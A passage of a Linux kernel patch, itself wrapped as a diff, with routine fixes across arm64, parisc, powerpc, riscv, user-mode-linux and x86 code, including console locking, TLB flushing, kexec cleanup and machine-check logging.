++++ b/arch/arm64/boot/dts/qcom/sdm850-samsung-w737.dts
+@@ -415,8 +415,10 @@
+ };
+ 
+ &qup_i2c12_default {
+-	drive-strength = <2>;
+-	bias-disable;
++	pinmux {
++		drive-strength = <2>;
++		bias-disable;
++	};
+ };
+ 
+ &qup_uart6_default {
+diff --git a/arch/arm64/kernel/stacktrace.c b/arch/arm64/kernel/stacktrace.c
+index 634279b3b03d1..117e2c180f3c7 100644
+--- a/arch/arm64/kernel/stacktrace.c
++++ b/arch/arm64/kernel/stacktrace.c
+@@ -23,8 +23,8 @@
+  *
+  * The regs must be on a stack currently owned by the calling task.
+  */
+-static inline void unwind_init_from_regs(struct unwind_state *state,
+-					 struct pt_regs *regs)
++static __always_inline void unwind_init_from_regs(struct unwind_state *state,
++						  struct pt_regs *regs)
+ {
+ 	unwind_init_common(state, current);
+ 
+@@ -58,8 +58,8 @@ static __always_inline void unwind_init_from_caller(struct unwind_state *state)
+  * duration of the unwind, or the unwind will be bogus. It is never valid to
+  * call this for the current task.
+  */
+-static inline void unwind_init_from_task(struct unwind_state *state,
+-					 struct task_struct *task)
++static __always_inline void unwind_init_from_task(struct unwind_state *state,
++						  struct task_struct *task)
+ {
+ 	unwind_init_common(state, task);
+ 
+@@ -186,7 +186,7 @@ void show_stack(struct task_struct *tsk, unsigned long *sp, const char *loglvl)
+ 			: stackinfo_get_unknown();		\
+ 	})
+ 
+-noinline notrace void arch_stack_walk(stack_trace_consume_fn consume_entry,
++noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ 			      void *cookie, struct task_struct *task,
+ 			      struct pt_regs *regs)
+ {
+diff --git a/arch/parisc/include/asm/pgtable.h b/arch/parisc/include/asm/pgtable.h
+index ecd0288544698..68ae77069d23f 100644
+--- a/arch/parisc/include/asm/pgtable.h
++++ b/arch/parisc/include/asm/pgtable.h
+@@ -166,8 +166,8 @@ extern void __update_cache(pte_t pte);
+ 
+ /* This calculates the number of initial pages we need for the initial
+  * page tables */
+-#if (KERNEL_INITIAL_ORDER) >= (PMD_SHIFT)
+-# define PT_INITIAL	(1 << (KERNEL_INITIAL_ORDER - PMD_SHIFT))
++#if (KERNEL_INITIAL_ORDER) >= (PLD_SHIFT + BITS_PER_PTE)
++# define PT_INITIAL	(1 << (KERNEL_INITIAL_ORDER - PLD_SHIFT - BITS_PER_PTE))
+ #else
+ # define PT_INITIAL	(1)  /* all initial PTEs fit into one page */
+ #endif
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index 6a7e315bcc2e5..a115315d88e69 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -1288,9 +1288,8 @@ void pdc_io_reset_devices(void)
+ 
+ #endif /* defined(BOOTLOADER) */
+ 
+-/* locked by pdc_console_lock */
+-static int __attribute__((aligned(8)))   iodc_retbuf[32];
+-static char __attribute__((aligned(64))) iodc_dbuf[4096];
++/* locked by pdc_lock */
++static char iodc_dbuf[4096] __page_aligned_bss;
+ 
+ /**
+  * pdc_iodc_print - Console print using IODC.
+@@ -1307,6 +1306,9 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 	unsigned int i;
+ 	unsigned long flags;
+ 
++	count = min_t(unsigned int, count, sizeof(iodc_dbuf));
++
++	spin_lock_irqsave(&pdc_lock, flags);
+ 	for (i = 0; i < count;) {
+ 		switch(str[i]) {
+ 		case '\n':
+@@ -1322,12 +1324,11 @@ int pdc_iodc_print(const unsigned char *str, unsigned count)
+ 	}
+ 
+ print:
+-        spin_lock_irqsave(&pdc_lock, flags);
+-        real32_call(PAGE0->mem_cons.iodc_io,
+-                    (unsigned long)PAGE0->mem_cons.hpa, ENTRY_IO_COUT,
+-                    PAGE0->mem_cons.spa, __pa(PAGE0->mem_cons.dp.layers),
+-                    __pa(iodc_retbuf), 0, __pa(iodc_dbuf), i, 0);
+-        spin_unlock_irqrestore(&pdc_lock, flags);
++	real32_call(PAGE0->mem_cons.iodc_io,
++		(unsigned long)PAGE0->mem_cons.hpa, ENTRY_IO_COUT,
++		PAGE0->mem_cons.spa, __pa(PAGE0->mem_cons.dp.layers),
++		__pa(pdc_result), 0, __pa(iodc_dbuf), i, 0);
++	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+ 	return i;
+ }
+@@ -1354,10 +1355,11 @@ int pdc_iodc_getc(void)
+ 	real32_call(PAGE0->mem_kbd.iodc_io,
+ 		    (unsigned long)PAGE0->mem_kbd.hpa, ENTRY_IO_CIN,
+ 		    PAGE0->mem_kbd.spa, __pa(PAGE0->mem_kbd.dp.layers), 
+-		    __pa(iodc_retbuf), 0, __pa(iodc_dbuf), 1, 0);
++		    __pa(pdc_result), 0, __pa(iodc_dbuf), 1, 0);
+ 
+ 	ch = *iodc_dbuf;
+-	status = *iodc_retbuf;
++	/* like convert_to_wide() but for first return value only: */
++	status = *(int *)&pdc_result;
+ 	spin_unlock_irqrestore(&pdc_lock, flags);
+ 
+ 	if (status == 0)
+diff --git a/arch/parisc/kernel/kgdb.c b/arch/parisc/kernel/kgdb.c
+index ab7620f695be1..b16fa9bac5f44 100644
+--- a/arch/parisc/kernel/kgdb.c
++++ b/arch/parisc/kernel/kgdb.c
+@@ -208,23 +208,3 @@ int kgdb_arch_handle_exception(int trap, int signo,
+ 	}
+ 	return -1;
+ }
+-
+-/* KGDB console driver which uses PDC to read chars from keyboard */
+-
+-static void kgdb_pdc_write_char(u8 chr)
+-{
+-	/* no need to print char. kgdb will do it. */
+-}
+-
+-static struct kgdb_io kgdb_pdc_io_ops = {
+-	.name		= "kgdb_pdc",
+-	.read_char	= pdc_iodc_getc,
+-	.write_char	= kgdb_pdc_write_char,
+-};
+-
+-static int __init kgdb_pdc_init(void)
+-{
+-	kgdb_register_io_module(&kgdb_pdc_io_ops);
+-	return 0;
+-}
+-early_initcall(kgdb_pdc_init);
+diff --git a/arch/parisc/kernel/pdc_cons.c b/arch/parisc/kernel/pdc_cons.c
+index 7d0989f523d03..cf3bf82323746 100644
+--- a/arch/parisc/kernel/pdc_cons.c
++++ b/arch/parisc/kernel/pdc_cons.c
+@@ -12,37 +12,27 @@
+ #include <asm/page.h>		/* for PAGE0 */
+ #include <asm/pdc.h>		/* for iodc_call() proto and friends */
+ 
+-static DEFINE_SPINLOCK(pdc_console_lock);
+-
+ static void pdc_console_write(struct console *co, const char *s, unsigned count)
+ {
+ 	int i = 0;
+-	unsigned long flags;
+ 
+-	spin_lock_irqsave(&pdc_console_lock, flags);
+ 	do {
+ 		i += pdc_iodc_print(s + i, count - i);
+ 	} while (i < count);
+-	spin_unlock_irqrestore(&pdc_console_lock, flags);
+ }
+ 
+ #ifdef CONFIG_KGDB
+ static int kgdb_pdc_read_char(void)
+ {
+-	int c;
+-	unsigned long flags;
+-
+-	spin_lock_irqsave(&pdc_console_lock, flags);
+-	c = pdc_iodc_getc();
+-	spin_unlock_irqrestore(&pdc_console_lock, flags);
++	int c = pdc_iodc_getc();
+ 
+ 	return (c <= 0) ? NO_POLL_CHAR : c;
+ }
+ 
+ static void kgdb_pdc_write_char(u8 chr)
+ {
+-	if (PAGE0->mem_cons.cl_class != CL_DUPLEX)
+-		pdc_console_write(NULL, &chr, 1);
++	/* no need to print char as it's shown on standard console */
++	/* pdc_iodc_print(&chr, 1); */
+ }
+ 
+ static struct kgdb_io kgdb_pdc_io_ops = {
+diff --git a/arch/parisc/kernel/vdso32/Makefile b/arch/parisc/kernel/vdso32/Makefile
+index 85b1c6d261d12..4459a48d23033 100644
+--- a/arch/parisc/kernel/vdso32/Makefile
++++ b/arch/parisc/kernel/vdso32/Makefile
+@@ -26,7 +26,7 @@ $(obj)/vdso32_wrapper.o : $(obj)/vdso32.so FORCE
+ 
+ # Force dependency (incbin is bad)
+ # link rule for the .so file, .lds has to be first
+-$(obj)/vdso32.so: $(src)/vdso32.lds $(obj-vdso32) $(obj-cvdso32) $(VDSO_LIBGCC)
++$(obj)/vdso32.so: $(src)/vdso32.lds $(obj-vdso32) $(obj-cvdso32) $(VDSO_LIBGCC) FORCE
+ 	$(call if_changed,vdso32ld)
+ 
+ # assembly rules for the .S files
+@@ -38,7 +38,7 @@ $(obj-cvdso32): %.o: %.c FORCE
+ 
+ # actual build commands
+ quiet_cmd_vdso32ld = VDSO32L $@
+-      cmd_vdso32ld = $(CROSS32CC) $(c_flags) -Wl,-T $^ -o $@
++      cmd_vdso32ld = $(CROSS32CC) $(c_flags) -Wl,-T $(filter-out FORCE, $^) -o $@
+ quiet_cmd_vdso32as = VDSO32A $@
+       cmd_vdso32as = $(CROSS32CC) $(a_flags) -c -o $@ $<
+ quiet_cmd_vdso32cc = VDSO32C $@
+diff --git a/arch/parisc/kernel/vdso64/Makefile b/arch/parisc/kernel/vdso64/Makefile
+index a30f5ec5eb4bf..f3d6045793f4c 100644
+--- a/arch/parisc/kernel/vdso64/Makefile
++++ b/arch/parisc/kernel/vdso64/Makefile
+@@ -26,7 +26,7 @@ $(obj)/vdso64_wrapper.o : $(obj)/vdso64.so FORCE
+ 
+ # Force dependency (incbin is bad)
+ # link rule for the .so file, .lds has to be first
+-$(obj)/vdso64.so: $(src)/vdso64.lds $(obj-vdso64) $(VDSO_LIBGCC)
++$(obj)/vdso64.so: $(src)/vdso64.lds $(obj-vdso64) $(VDSO_LIBGCC) FORCE
+ 	$(call if_changed,vdso64ld)
+ 
+ # assembly rules for the .S files
+@@ -35,7 +35,7 @@ $(obj-vdso64): %.o: %.S FORCE
+ 
+ # actual build commands
+ quiet_cmd_vdso64ld = VDSO64L $@
+-      cmd_vdso64ld = $(CC) $(c_flags) -Wl,-T $^ -o $@
++      cmd_vdso64ld = $(CC) $(c_flags) -Wl,-T $(filter-out FORCE, $^) -o $@
+ quiet_cmd_vdso64as = VDSO64A $@
+       cmd_vdso64as = $(CC) $(a_flags) -c -o $@ $<
+ 
+diff --git a/arch/powerpc/include/asm/ftrace.h b/arch/powerpc/include/asm/ftrace.h
+index 3cee7115441b4..e3d1f377bc5b5 100644
+--- a/arch/powerpc/include/asm/ftrace.h
++++ b/arch/powerpc/include/asm/ftrace.h
+@@ -64,17 +64,6 @@ void ftrace_graph_func(unsigned long ip, unsigned long parent_ip,
+  * those.
+  */
+ #define ARCH_HAS_SYSCALL_MATCH_SYM_NAME
+-#ifdef CONFIG_PPC64_ELF_ABI_V1
+-static inline bool arch_syscall_match_sym_name(const char *sym, const char *name)
+-{
+-	/* We need to skip past the initial dot, and the __se_sys alias */
+-	return !strcmp(sym + 1, name) ||
+-		(!strncmp(sym, ".__se_sys", 9) && !strcmp(sym + 6, name)) ||
+-		(!strncmp(sym, ".ppc_", 5) && !strcmp(sym + 5, name + 4)) ||
+-		(!strncmp(sym, ".ppc32_", 7) && !strcmp(sym + 7, name + 4)) ||
+-		(!strncmp(sym, ".ppc64_", 7) && !strcmp(sym + 7, name + 4));
+-}
+-#else
+ static inline bool arch_syscall_match_sym_name(const char *sym, const char *name)
+ {
+ 	return !strcmp(sym, name) ||
+@@ -83,7 +72,6 @@ static inline bool arch_syscall_match_sym_name(const char *sym, const char *name
+ 		(!strncmp(sym, "ppc32_", 6) && !strcmp(sym + 6, name + 4)) ||
+ 		(!strncmp(sym, "ppc64_", 6) && !strcmp(sym + 6, name + 4));
+ }
+-#endif /* CONFIG_PPC64_ELF_ABI_V1 */
+ #endif /* CONFIG_FTRACE_SYSCALLS */
+ 
+ #if defined(CONFIG_PPC64) && defined(CONFIG_FUNCTION_TRACER)
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 593cf09264d80..8e5fd56820189 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -502,7 +502,7 @@ config KEXEC_FILE
+ 	select KEXEC_CORE
+ 	select KEXEC_ELF
+ 	select HAVE_IMA_KEXEC if IMA
+-	depends on 64BIT
++	depends on 64BIT && MMU
+ 	help
+ 	  This is new version of kexec system call. This system call is
+ 	  file based and takes file descriptors as system call argument
+diff --git a/arch/riscv/include/asm/kexec.h b/arch/riscv/include/asm/kexec.h
+index eee260e8ab308..2b56769cb530c 100644
+--- a/arch/riscv/include/asm/kexec.h
++++ b/arch/riscv/include/asm/kexec.h
+@@ -39,6 +39,7 @@ crash_setup_regs(struct pt_regs *newregs,
+ #define ARCH_HAS_KIMAGE_ARCH
+ 
+ struct kimage_arch {
++	void *fdt; /* For CONFIG_KEXEC_FILE */
+ 	unsigned long fdt_addr;
+ };
+ 
+@@ -62,6 +63,10 @@ int arch_kexec_apply_relocations_add(struct purgatory_info *pi,
+ 				     const Elf_Shdr *relsec,
+ 				     const Elf_Shdr *symtab);
+ #define arch_kexec_apply_relocations_add arch_kexec_apply_relocations_add
++
++struct kimage;
++int arch_kimage_file_post_load_cleanup(struct kimage *image);
++#define arch_kimage_file_post_load_cleanup arch_kimage_file_post_load_cleanup
+ #endif
+ 
+ #endif
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 0099dc1161683..5ff1f19fd45c2 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,6 +19,8 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
++	/* A local tlb flush is needed before user execution can resume. */
++	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 92ec2d9d7273f..ec6fb83349ced 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -415,7 +415,7 @@ static inline void update_mmu_cache(struct vm_area_struct *vma,
+ 	 * Relying on flush_tlb_fix_spurious_fault would suffice, but
+ 	 * the extra traps reduce performance.  So, eagerly SFENCE.VMA.
+ 	 */
+-	local_flush_tlb_page(address);
++	flush_tlb_page(vma, address);
+ }
+ 
+ static inline void update_mmu_cache_pmd(struct vm_area_struct *vma,
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 801019381dea3..907b9efd39a87 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,6 +22,24 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
++
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/kernel/elf_kexec.c b/arch/riscv/kernel/elf_kexec.c
+index 0cb94992c15b3..5372b708fae21 100644
+--- a/arch/riscv/kernel/elf_kexec.c
++++ b/arch/riscv/kernel/elf_kexec.c
+@@ -21,6 +21,18 @@
+ #include <linux/memblock.h>
+ #include <asm/setup.h>
+ 
++int arch_kimage_file_post_load_cleanup(struct kimage *image)
++{
++	kvfree(image->arch.fdt);
++	image->arch.fdt = NULL;
++
++	vfree(image->elf_headers);
++	image->elf_headers = NULL;
++	image->elf_headers_sz = 0;
++
++	return kexec_image_post_load_cleanup_default(image);
++}
++
+ static int riscv_kexec_elf_load(struct kimage *image, struct elfhdr *ehdr,
+ 				struct kexec_elf_info *elf_info, unsigned long old_pbase,
+ 				unsigned long new_pbase)
+@@ -298,6 +310,8 @@ static void *elf_kexec_load(struct kimage *image, char *kernel_buf,
+ 		pr_err("Error add DTB kbuf ret=%d\n", ret);
+ 		goto out_free_fdt;
+ 	}
++	/* Cache the fdt buffer address for memory cleanup */
++	image->arch.fdt = fdt;
+ 	pr_notice("Loaded device tree at 0x%lx\n", kbuf.mem);
+ 	goto out;
+ 
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 08d11a53f39e7..bcfe9eb55f80f 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -58,7 +58,7 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 		} else {
+ 			fp = frame->fp;
+ 			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
+-						   (unsigned long *)(fp - 8));
++						   &frame->ra);
+ 		}
+ 
+ 	}
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 7acbfbd14557e..80ce9caba8d22 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,6 +196,16 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
++#ifdef CONFIG_SMP
++	else {
++		cpumask_t *mask = &mm->context.tlb_stale_mask;
++
++		if (cpumask_test_cpu(cpu, mask)) {
++			cpumask_clear_cpu(cpu, mask);
++			local_flush_tlb_all_asid(cntx & asid_mask);
++		}
++	}
++#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index 37ed760d007c3..ce7dfc81bb3fe 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,23 +5,7 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
++#include <asm/tlbflush.h>
+ 
+ void flush_tlb_all(void)
+ {
+@@ -31,6 +15,7 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
++	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
+ 	bool broadcast;
+@@ -44,6 +29,15 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
++		/*
++		 * TLB will be immediately flushed on harts concurrently
++		 * executing this MM context. TLB flush on other harts
++		 * is deferred until this MM context migrates there.
++		 */
++		cpumask_setall(pmask);
++		cpumask_clear_cpu(cpuid, pmask);
++		cpumask_andnot(pmask, pmask, cmask);
++
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+ 		} else if (size <= stride) {
+diff --git a/arch/um/drivers/virt-pci.c b/arch/um/drivers/virt-pci.c
+index acb55b302b14c..3ac220dafec4a 100644
+--- a/arch/um/drivers/virt-pci.c
++++ b/arch/um/drivers/virt-pci.c
+@@ -97,7 +97,8 @@ static int um_pci_send_cmd(struct um_pci_device *dev,
+ 	}
+ 
+ 	buf = get_cpu_var(um_pci_msg_bufs);
+-	memcpy(buf, cmd, cmd_size);
++	if (buf)
++		memcpy(buf, cmd, cmd_size);
+ 
+ 	if (posted) {
+ 		u8 *ncmd = kmalloc(cmd_size + extra_size, GFP_ATOMIC);
+@@ -182,6 +183,7 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 	struct um_pci_message_buffer *buf;
+ 	u8 *data;
+ 	unsigned long ret = ULONG_MAX;
++	size_t bytes = sizeof(buf->data);
+ 
+ 	if (!dev)
+ 		return ULONG_MAX;
+@@ -189,7 +191,8 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 	buf = get_cpu_var(um_pci_msg_bufs);
+ 	data = buf->data;
+ 
+-	memset(buf->data, 0xff, sizeof(buf->data));
++	if (buf)
++		memset(data, 0xff, bytes);
+ 
+ 	switch (size) {
+ 	case 1:
+@@ -204,7 +207,7 @@ static unsigned long um_pci_cfgspace_read(void *priv, unsigned int offset,
+ 		goto out;
+ 	}
+ 
+-	if (um_pci_send_cmd(dev, &hdr, sizeof(hdr), NULL, 0, data, 8))
++	if (um_pci_send_cmd(dev, &hdr, sizeof(hdr), NULL, 0, data, bytes))
+ 		goto out;
+ 
+ 	switch (size) {
+diff --git a/arch/x86/events/intel/uncore.h b/arch/x86/events/intel/uncore.h
+index 2adeaf4de4df6..b363fddc2a89e 100644
+--- a/arch/x86/events/intel/uncore.h
++++ b/arch/x86/events/intel/uncore.h
+@@ -2,6 +2,7 @@
+ #include <linux/slab.h>
+ #include <linux/pci.h>
+ #include <asm/apicdef.h>
++#include <asm/intel-family.h>
+ #include <linux/io-64-nonatomic-lo-hi.h>
+ 
+ #include <linux/perf_event.h>
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index fcd95e93f479a..8f371f3cbbd24 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -3804,6 +3804,21 @@ static const struct attribute_group *skx_iio_attr_update[] = {
+ 	NULL,
+ };
+ 
++static void pmu_clear_mapping_attr(const struct attribute_group **groups,
++				   struct attribute_group *ag)
++{
++	int i;
++
++	for (i = 0; groups[i]; i++) {
++		if (groups[i] == ag) {
++			for (i++; groups[i]; i++)
++				groups[i - 1] = groups[i];
++			groups[i - 1] = NULL;
++			break;
++		}
++	}
++}
++
+ static int
+ pmu_iio_set_mapping(struct intel_uncore_type *type, struct attribute_group *ag)
+ {
+@@ -3852,7 +3867,7 @@ clear_attrs:
+ clear_topology:
+ 	kfree(type->topology);
+ clear_attr_update:
+-	type->attr_update = NULL;
++	pmu_clear_mapping_attr(type->attr_update, ag);
+ 	return ret;
+ }
+ 
+@@ -5144,6 +5159,11 @@ static int icx_iio_get_topology(struct intel_uncore_type *type)
+ 
+ static int icx_iio_set_mapping(struct intel_uncore_type *type)
+ {
++	/* Detect ICX-D system. This case is not supported */
++	if (boot_cpu_data.x86_model == INTEL_FAM6_ICELAKE_D) {
++		pmu_clear_mapping_attr(type->attr_update, &icx_iio_mapping_group);
++		return -EPERM;
++	}
+ 	return pmu_iio_set_mapping(type, &icx_iio_mapping_group);
+ }
+ 
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 1c87501e0fa3d..10fb5b5c9efa4 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -788,6 +788,24 @@ _log_error_bank(unsigned int bank, u32 msr_stat, u32 msr_addr, u64 misc)
+ 	return status & MCI_STATUS_DEFERRED;
+ }
+ 
++static bool _log_error_deferred(unsigned int bank, u32 misc)
++{
++	if (!_log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS),
++			     mca_msr_reg(bank, MCA_ADDR), misc))
++		return false;
++
++	/*
++	 * Non-SMCA systems don't have MCA_DESTAT/MCA_DEADDR registers.
++	 * Return true here to avoid accessing these registers.
++	 */
++	if (!mce_flags.smca)
++		return true;
++
++	/* Clear MCA_DESTAT if the deferred error was logged from MCA_STATUS. */
++	wrmsrl(MSR_AMD64_SMCA_MCx_DESTAT(bank), 0);
++	return true;
++}
++
+ /*
+  * We have three scenarios for checking for Deferred errors:
+  *
+@@ -799,19 +817,8 @@ _log_error_bank(unsigned int bank, u32 msr_stat, u32 msr_addr, u64 misc)
+  */
+ static void log_error_deferred(unsigned int bank)
+ {
+-	bool defrd;
+-
+-	defrd = _log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS),
+-				mca_msr_reg(bank, MCA_ADDR), 0);
+-
+-	if (!mce_flags.smca)
+-		return;
+-
+-	/* Clear MCA_DESTAT if we logged the deferred error from MCA_STATUS. */
+-	if (defrd) {
+-		wrmsrl(MSR_AMD64_SMCA_MCx_DESTAT(bank), 0);
++	if (_log_error_deferred(bank, 0))
+ 		return;
+-	}
+ 
+ 	/*
+ 	 * Only deferred errors are logged in MCA_DE{STAT,ADDR} so just check
+@@ -832,7 +839,7 @@ static void amd_deferred_error_interrupt(void)
+ 
+ static void log_error_thresholding(unsigned int bank, u64 misc)
+ {
+-	_log_error_bank(bank, mca_msr_reg(bank, MCA_STATUS), mca_msr_reg(bank, MCA_ADDR), misc);
++	_log_error_deferred(bank, misc);
+ }
+ 
+ static void log_and_reset_block(struct threshold_block *block)
+diff --git a/arch/x86/kernel/cpu/microcode/intel.c b/arch/x86/kernel/cpu/microcode/intel.c
+index 1fcbd671f1dff..048e38ec99e71 100644
+--- a/arch/x86/kernel/cpu/microcode/intel.c
++++ b/arch/x86/kernel/cpu/microcode/intel.c
+@@ -621,7 +621,6 @@ void load_ucode_intel_ap(void)
+ 	else
+ 		iup = &intel_ucode_patch;
+ 
+-reget:
+ 	if (!*iup) {
+ 		patch = __load_ucode_intel(&uci);
+ 		if (!patch)
+@@ -632,12 +631,7 @@ reget:
+ 
+ 	uci.mc = *iup;
+ 
+-	if (apply_microcode_early(&uci, true)) {
+-		/* Mixed-silicon system? Try to refetch the proper patch: */
+-		*iup = NULL;
+-
+-		goto reget;
+-	}
++	apply_microcode_early(&uci, true);
+ }
+ 
+ static struct microcode_intel *find_patch(struct ucode_cpu_info *uci)
+diff --git a/arch/x86/kernel/fpu/xstate.c b/arch/x86/kernel/fpu/xstate.c
+index 59e543b95a3c6..c2dde46a538e7 100644
+--- a/arch/x86/kernel/fpu/xstate.c
++++ b/arch/x86/kernel/fpu/xstate.c
+@@ -440,8 +440,8 @@ static void __init __xstate_dump_leaves(void)
+ 	}
+ }
+ 
+-#define XSTATE_WARN_ON(x) do {							\
+-	if (WARN_ONCE(x, "XSAVE consistency problem, dumping leaves")) {	\
++#define XSTATE_WARN_ON(x, fmt, ...) do {					\
++	if (WARN_ONCE(x, "XSAVE consistency problem: " fmt, ##__VA_ARGS__)) {	\
+ 		__xstate_dump_leaves();						\
+ 	}									\
+ } while (0)
+@@ -554,8 +554,7 @@ static bool __init check_xstate_against_struct(int nr)
+ 	    (nr >= XFEATURE_MAX) ||
+ 	    (nr == XFEATURE_PT_UNIMPLEMENTED_SO_FAR) ||
+ 	    ((nr >= XFEATURE_RSRVD_COMP_11) && (nr <= XFEATURE_RSRVD_COMP_16))) {
+-		WARN_ONCE(1, "no structure for xstate: %d\n", nr);
+-		XSTATE_WARN_ON(1);
++		XSTATE_WARN_ON(1, "No structure for xstate: %d\n", nr);
+ 		return false;
+ 	}
+ 	return true;
+@@ -598,12 +597,13 @@ static bool __init paranoid_xstate_size_valid(unsigned int kernel_size)
+ 		 * XSAVES.
+ 		 */
+ 		if (!xsaves && xfeature_is_supervisor(i)) {
+-			XSTATE_WARN_ON(1);
++			XSTATE_WARN_ON(1, "Got supervisor feature %d, but XSAVES not advertised\n", i);
+ 			return false;
+ 		}
+ 	}
+ 	size = xstate_calculate_size(fpu_kernel_cfg.max_features, compacted);
+-	XSTATE_WARN_ON(size != kernel_size);
++	XSTATE_WARN_ON(size != kernel_size,
++		       "size %u != kernel_size %u\n", size, kernel_size);
+ 	return size == kernel_size;
+ }
+ 
+diff --git a/arch/x86/kernel/ftrace.c b/arch/x86/kernel/ftrace.c
+index bd165004776d9..e07234ec7e237 100644
+--- a/arch/x86/kernel/ftrace.c
++++ b/arch/x86/kernel/ftrace.c
+@@ -217,7 +217,9 @@ void ftrace_replace_code(int enable)
+ 
+ 		ret = ftrace_verify_code(rec->ip, old);
+ 		if (ret) {
++			ftrace_expected = old;
+ 			ftrace_bug(ret, rec);
++			ftrace_expected = NULL;
+ 			return;
+ 		}
+ 	}
+diff --git a/arch/x86/kernel/kprobes/core.c b/arch/x86/kernel/kprobes/core.c
+index eb8bc82846b99..5be7f23099e1f 100644
+--- a/arch/x86/kernel/kprobes/core.c
++++ b/arch/x86/kernel/kprobes/core.c
+@@ -37,6 +37,7 @@
+ #include <linux/extable.h>
+ #include <linux/kdebug.h>
+ #include <linux/kallsyms.h>
++#include <linux/kgdb.h>
+ #include <linux/ftrace.h>
+ #include <linux/kasan.h>
+ #include <linux/moduleloader.h>
+@@ -281,12 +282,15 @@ static int can_probe(unsigned long paddr)
+ 		if (ret < 0)
+ 			return 0;
+ 
++#ifdef CONFIG_KGDB
+ 		/*
+-		 * Another debugging subsystem might insert this breakpoint.
+-		 * In that case, we can't recover it.
++		 * If there is a dynamically installed kgdb sw breakpoint,
++		 * this function should not be probed.
+ 		 */
+-		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE)
++		if (insn.opcode.bytes[0] == INT3_INSN_OPCODE &&
++		    kgdb_has_hit_break(addr))
+ 			return 0;
++#endif
+ 		addr += insn.length;
+ 	}
+ 
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e6b8c5362b945..e57e07b0edb64 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -15,6 +15,7 @@
+ #include <linux/extable.h>
+ #include <linux/kdebug.h>
+ #include <linux/kallsyms.h>
++#include <linux/kgdb.h>
+ #include <linux/ftrace.h>
